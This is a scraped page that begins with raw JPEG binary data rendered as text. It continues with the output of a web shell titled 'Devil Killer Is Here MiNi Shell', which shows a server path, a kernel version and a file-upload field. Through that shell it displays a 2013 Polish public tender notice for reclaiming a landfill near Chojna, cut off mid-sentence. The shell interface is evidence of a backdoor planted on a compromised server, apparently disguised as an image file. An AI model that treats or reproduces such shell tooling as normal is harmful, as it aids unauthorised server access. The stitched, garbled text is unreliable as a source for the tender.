JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131231/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131231/284165-N-2013.html

<p class="kh_header"><b>Chojna: Rekultywacja wysypiska odpadów innych niż niebezpieczne w miejscowości Kaliska Gmina Chojna Ozn. sprawy: ZP/DO/02/2013</b><br>
<b>Numer ogłoszenia: 284165 - 2013; data zamieszczenia: 31.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Usług Komunalnych w Chojnie Sp. z o.o. , ul. Słowiańska 1, 74-500 Chojna, woj. zachodniopomorskie, tel. 0914141644, faks 091 4141881.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pukchojna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rekultywacja wysypiska odpadów innych niż niebezpieczne w miejscowości Kaliska Gmina Chojna Ozn. sprawy: ZP/DO/02/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie rekultywacji wysypiska odpadów innych niż niebezpieczne i obojętne w miejscowości Kaliska, Gmina Chojna. Wysypisko położone jest na działce o nr geod. 6/2  obręb Kaliska  Gmina Chojna. Właścicielem składowiska jest Gmina Chojna,  bieżącą eksploatację wysypiska prowadzi w ramach umowy użyczenia Przedsiębiorstwo Usług Komunalnych w Chojnie Sp. z o.o.
2.	Zakres prac rekultywacyjnych obejmuje: 

2.1. Wykonanie okrywy rekultywacyjnej zamkniętego składowiska odpadów,

1)	Konstrukcja warstwy rekultywacyjnej składa się (od dołu) z:

a)	warstwy wyrównawczej,
b)	warstwy odgazowującej (drenaż biogazu),
c)	warstwy uszczelniającej,
d)	warstwy drenażu wód powierzchniowych,
e)	warstwy rekultywacyjnej właściwej (glebowej),

2)   Na okrywie należy wykonać zabiegi agrotechniczne oraz wysiew traw i nasadzenia roślinności.

3)	Wybrane parametry techniczne rekultywowanego składowiska:

a)	powierzchnia objęta rekultywacją (w rzucie): 10 200 m2,
b)	powierzchnia wierzchowiny: 6 345 m2,
c)	powierzchnia skarp: 4 110 m2,
d)	powierzchnia objętą rekultywacją techniczną (skarpy + wierzchowina): 10 455 m2,
e)	powierzchnia objęta rekultywacją  biologiczną (skarpy + wierzchowina + skarpy wałów): 11 807 m2,
f)	max. rzędna po wykonaniu przemieszczeń: 75,04 m.n.p.m.
g)	max. rzędna wierzchowin po rekultywacji: 76,09 m.n.p.m.

4)  Wykaz mas do wykonania rekultywacji:

a)	masy odpadowe do przemieszczenia i ponownego wbudowania: 1 030 m3,
b)	masy ziemne do dostarczenia w celu utworzenia warstwy wyrównawczej: 2 613 m3,
c)	masy ziemne do dostarczenia w celu utworzenia warstwy drenażu biogazu: 2 091 m3,
d)	masy ziemne do dostarczenia w celu utworzenia warstwy drenażu wód: 3 136,5 m3,
e)	masy ziemne do dostarczenia w celu utworzenia warstwy glebowej: 3 136,5 m3,
f)	maksymalna odległość przemieszczeń mas ziemno-odpadowych: 40 m, 

5)   Wykaz materiałów u urządzeń do wykonania rekultywacji:

a)	mata bentonitowa o zawartości bentonitu 5 kg/m2: 10 704 m2,
b)	kręgi betonowe O1200, h = 50 cm. : 18 szt.,
c)	kręgi betonowe O 1500, h = 50 cm.: 8 szt., (wariantowo 1 studnia systemowa o h = 4,00m),
d)	rury O 200: 9,60 m,
e)	korytka betonowe 0,6 x 0,5x 0,20 m : 192,0 m., 
f)	wapno nawozowe; 602 kg,
g)	nawóz azotowo - fosforowo - potasowy (N:P:K): 236 kg:
h)	mieszanka traw: 212,5 kg,
i)	krzewy ligustru pospolitego: 540 szt. 

6) Szczegółowy zakres prac w zakresie rekultywacji składowiska odpadów określony został w:
 
a)	Dokumentacji określającej warunki zamknięcia i rekultywacji składowiska odpadów innych niż niebezpieczne i obojętne w m. Kaliska stanowiącej załącznik Nr 10 do SIWZ. 
b)	Przedmiarze robót rekultywacji składowiska odpadów innych niż niebezpieczne i obojętne w m. Kaliska stanowiącym załącznik Nr 11  do  SIWZ.

2.2. Ujęcie i unieszkodliwienie gazu składowiskowego.

1)	Przedmiotem zamówienia w zakresie ujęcia i unieszkodliwiania gazu składowiskowego jest wykonanie przyłącza gazu składowiskowego ze studni odgazowujących do pochodni na terenie składowiska. Przyłącze  gazu składowiskowego wykonane będzie dla 9-ciu studni odgazowujących z rur PE Dn 63-110 mm o łącznej  długości 271,5 m. w tym:
a)	przyłącze gazu Dn 52 mm PE - 126,5 m,
b)	przyłącze gazu Dn 90 mm PE - 104,5 m,
c)	przyłącze gazu Dn 110 mm PE - 40,5 m,

2)	Ponadto w zakresie ujęcia  i unieszkodliwiania gazu składowiskowego przedmiot zamówienia obejmuje wykonanie odprowadzenia kondensatu  z rury PE  Dn 63 mm  o długości 12,5 m oraz montaż pochodni szt. 1  o wysokości 2,90 m. 

3)	 Szczegółowy zakres prac ujęcia i unieszkodliwiania gazu składowiskowego określony został w:

a)	Dokumentacji technicznej Ujęcia i unieszkodliwiania gazu składowiskowego zamkniętego składowiska odpadów innych niż niebezpieczne i obojętne w m. Kaliska Gm. Chojna  stanowiącej załącznik Nr 12 do niniejszej  SIWZ. 
b)	Przedmiarze robót ujęcia i unieszkodliwiania gazu składowiskowego zamkniętego składowiska odpadów innych niż niebezpieczne i obojętne w m. Kaliska Gm. Chojna stanowiącym załącznik Nr 13 do SIWZ.

3.	Warunki zamknięcia i rekultywacji składowiska określone zostały w decyzji:

1)	Marszałka Województwa Zachodniopomorskiego WRiOŚ/II/IB7715/1-6/10  z dn. 18.06.2010 r. stanowiącej załącznik Nr 14 do SIWZ,
2)	Marszałka Województwa Zachodniopomorskiego WRiOŚ-II-IB-7715/2-1/10 z dn. 20.08.2010 r. stanowiącej załącznik Nr 15 do SIWZ,
3)	Marszałka Województwa Zachodniopomorskiego WOŚ.II.7241.1.2.2011.IB z dn. 28.09.2011 r. stanowiącej załącznik Nr 16 do SIWZ,
4)	Marszałka Województwa Zachodniopomorskiego WOŚ.II.7241.2.3.2013.IB z dn. 17.10.2013 r. stanowiącej załącznik Nr 17 do SIWZ,

4.	W przypadku utraty dofinansowania lub jego części  do zadania określonego w niniejszej  Specyfikacji Istotnych Warunków Zamówienia oraz umowie o zamówienie publiczne z powodów wynikających z niedotrzymania przez Wykonawcę  warunków  z winy leżącej po stronie Wykonawcy, Wykonawca zobowiązany będzie do zwrotu Zamawiającemu kwoty stanowiącej równowartość utraconego dofinansowania..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że  przewiduje możliwość udzielenia zamówień uzupełniających w trybie zamówienia  z wolnej ręki, których wartość nie przekroczy 50% zamówienia podstawowego, na zasadach określonych w art. 67 ust.1 pkt. 6 Prawa zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.22.21.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości 45.000,00 zł (słownie: czterdzieści pięć tysięcy złotych 00 gr. ). wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach określonych w art. 45.ust. 6 ustawy Pzp. 
2.	Wadium wnoszone w pieniądzu winno być wpłacone na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Chojnie Nr konta 78 9370 0007 0000 0215 2000 0004 , z dopiskiem: Wadium - Rekultywacja wysypiska odpadów innych niż niebezpieczne w miejscowości  Kaliska Gmina Chojna.
3.	Za datę wniesienia wadium uważa się datę wpływu środków pieniężnych na wskazany rachunek bankowy.
4.	 Wadium wniesione w innej formie niż pieniądz musi być złożone w oryginale i wystawione na Zamawiającego.
5.	Wadium wniesione przez konsorcjum w innej formie niż pieniądz winno być wniesione w imieniu konsorcjum.
6.	Zamawiający dokona zwrotu wadium  w przypadkach i na zasadach określonych w atr. 46 ust. 1-2 i 4 ustawy Pzp.
7.	Wykonawca, który nie wniesie wadium w terminie lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta, zostanie uznana za odrzuconą.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o których mowa w art. 26 ust. 1 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni iż wynika to z przyczyn nie leżących po jego stronie.
9.	Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz  Zamawiającego w przypadkach określonych w art. 46 ust. 5 ustawy Pzp.
10.	Zamawiający żądać będzie ponownego wniesienia wadium w przypadkach i na zadach określonych w art. 46 ust. 3 ustawy Pzp.
11.	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
1)	odmówi podpisania umowy na warunkach określonych w ofercie.
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonychw specyfikacji istotnych warunków zamówienia.
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, że spełnia                        ww. warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że należycie wykonał w okresie ostatnich  pięciu lat przed upływem terminu składania ofert,         a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie co najmniej jednej roboty budowlanej, w zakresie  rekultywacji składowisk odpadów lub budowy składowisk odpadów lub w zakresie robót ziemnych (tj. niwelacji terenu, wykonania skarp, kształtowania terenu itp.) o wartości nie mniejszej niż  400.000,00 zł). Zamawiający dokona oceny spełnienia warunków w oparciu o dokumenty i oświadczenia złożone przez wykonawcę w niniejszym postępowaniu metodą  - spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie       że dysponuje osobami posiadającymi wymagane uprawnienia do realizacji zamówienia oraz przedłoży wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za  świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz informacjami  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie   do dysonowania  tymi osobami. 

Wymagane kwalifikacje zawodowe i uprawnienia:

1)	kierownik robót konstrukcyjno - budowlanych - wymagane posiadanie uprawnień do wykonywania  samodzielnych funkcji,
2)	kierownik robót sanitarnych i wodno-kanalizacyjnych, instalacji gazowych - wymagane posiadanie uprawnień do wykonywania samodzielnych funkcji.
Osoby te winny posiadać odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane ( Dz. U. z 2013 r.,  poz. 1409 z późn. zm.) oraz z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578 i z 2007 r. Nr 210, poz. 1528) lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie wcześniej obowiązujących przepisów oraz przynależeć do właściwej izby samorządu zawodowego.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych  do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania         mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp).
Zamawiający dokona oceny spełnienia warunków w oparciu o dokumenty i oświadczenia złożone przez wykonawcę w niniejszym postępowaniu metodą  - spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży:

1)	Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawcza jest ubezpieczony od odpowiedzialności cywilnej zakresie prowadzonej działalności zawierającej klauzule nienależytego wykonania prac bądź umowy, klauzulę szkód w mieniu powierzonym, klauzulę szkód wyrządzonych przez podwykonawców, klauzulę szkód w mieniu otaczającym wyrządzonych w trakcie naprawy serwisu lub modernizacji. klauzulę szkód w środowisku naturalnym. Wymagana suma ubezpieczenia nie mniejsza niż 1.000.000,00 zł. (słownie: jeden milion zł 00 gr.). Z dokumentu (np. polisy) musi jednoznacznie wynikać, że wykonawca objęty jest na dzień składania oferty ochroną ubezpieczeniową. Jeżeli z dokumentu jednoznacznie nie wynika, że składka została zapłacona wykonawca winien dołączyć na potwierdzenie takiej okoliczności dowód opłacenia składki. Zamawiający dokona oceny spełnienia warunków w oparciu o dokumenty i oświadczenia złożone przez wykonawcę w niniejszym postępowaniu metodą  - spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony i podpisany Formularz Ofertowy  Wykonawcy - wg wzoru stanowiącego załącznik Nr 1 do SIWZ.
2)Wypełniony i podpisany formularz Wykaz stawek i narzutów - wg wzoru stanowiącego załącznik Nr 8 do SIWZ,
3)Wypełniony i podpisany Formularz Wykaz części zamówienia, których wykonawca zamierza powierzyć podwykonawcom - wg wzoru stanowiącego załącznik Nr 7 do SIWZ,
4)	Zaaprobowany projekt Umowy - wg wzoru stanowiącego załącznik Nr 9 do SIWZ,
5)	Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty,
6)	Pełnomocnictwo do podpisania oferty - w przypadku gdy upoważnienie nie wynika z dokumentów  (oryginał).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru Wykonawcy.
2.	Zmiana postanowień niniejszej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
3.	Zamawiający przewiduje możliwość wprowadzenia zmian w treści umowy tylko i wyłącznie w następujących   przypadkach:
1)	konieczności zmian w składzie personelu odpowiedzialnego za prawidłową realizację umowy, proponowana osoba musi posiadać kwalifikacje i doświadczenie, zgodne z wymaganiami określonymi w SIWZ
2)	wystąpienia okoliczności skutkujących potrzebą zmiany terminu realizacji zamówienia z powodu: 

